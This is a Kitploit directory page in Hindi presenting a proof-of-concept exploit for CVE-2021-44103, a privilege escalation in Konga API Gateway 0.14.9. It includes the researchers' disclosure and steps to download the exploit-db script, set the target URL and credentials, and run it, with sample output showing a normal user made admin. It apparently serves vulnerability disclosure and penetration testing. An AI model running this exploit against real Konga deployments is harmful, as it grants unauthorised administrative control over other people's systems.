Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44103 — CVE-2021-44103 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Konga API Gateway 0.14.9 में ऊर्ध्वाधर विशेषाधिकार वृद्धि प्रदर्शित करता है, जो प्रमाणित उपयोगकर्ताओं को व्यवस्थापक पहुँच प्राप्त करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/paulotrindadec/cve-2021-44103
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगAPI सुरक्षा
GitHubpaulotrindadec/cve-2021-44103

CVE-2021-44103

CVE-2021-44103 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Konga API Gateway 0.14.9 में ऊर्ध्वाधर विशेषाधिकार वृद्धि प्रदर्शित करता है, जो प्रमाणित उपयोगकर्ताओं को व्यवस्थापक पहुँच प्राप्त करने की अनुमति देता है।

रिपॉजिटरी देखें
33 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44103

KONGA 0.14.9 के लिए एक प्रूफ ऑफ कॉन्सेप्ट - विशेषाधिकार वृद्धि।

परिचय

16 नवंबर, 2021 को, Fabrício Salomão और मैंने Konga API गेटवे में एक भेद्यता पाई, जो किसी भी प्रमाणित उपयोगकर्ता को प्रशासक बनने की अनुमति देती है।

भेद्यता रिपोर्ट

उत्पाद: KONGA
मॉडल: 0.14.9
भेद्यता: विशेषाधिकार वृद्धि
प्रभाव: पूर्ण व्यवस्थापक पहुंच (ऊर्ध्वाधर विशेषाधिकार वृद्धि)
प्रमाणीकरण: आवश्यक
शोषण लेखक: Fabricio Salomao / Paulo Trindade

प्रूफ ऑफ कॉन्सेप्ट (PoC)

नीचे "usernormal" नाम का एक सामान्य उपयोगकर्ता बिना विशेषाधिकार के बनाया गया है।

Crash

Crash

नीचे दिए गए अनुरोध के माध्यम से पैरामीटर "admin" में फ्लैग "FALSE" को "TRUE" में बदल दिया गया।

Crash

इसलिए हमारे लिए एक शोषण बनाया गया : https://www.exploit-db.com/exploits/50521

Crash

शोषण चलाने के बाद, विशेषाधिकार वृद्धि सफल रही!

परिणाम:

Crash

शोषण चलाना

root@kitploit:~
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success

लिंक

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query

टूल डाउनलोड करें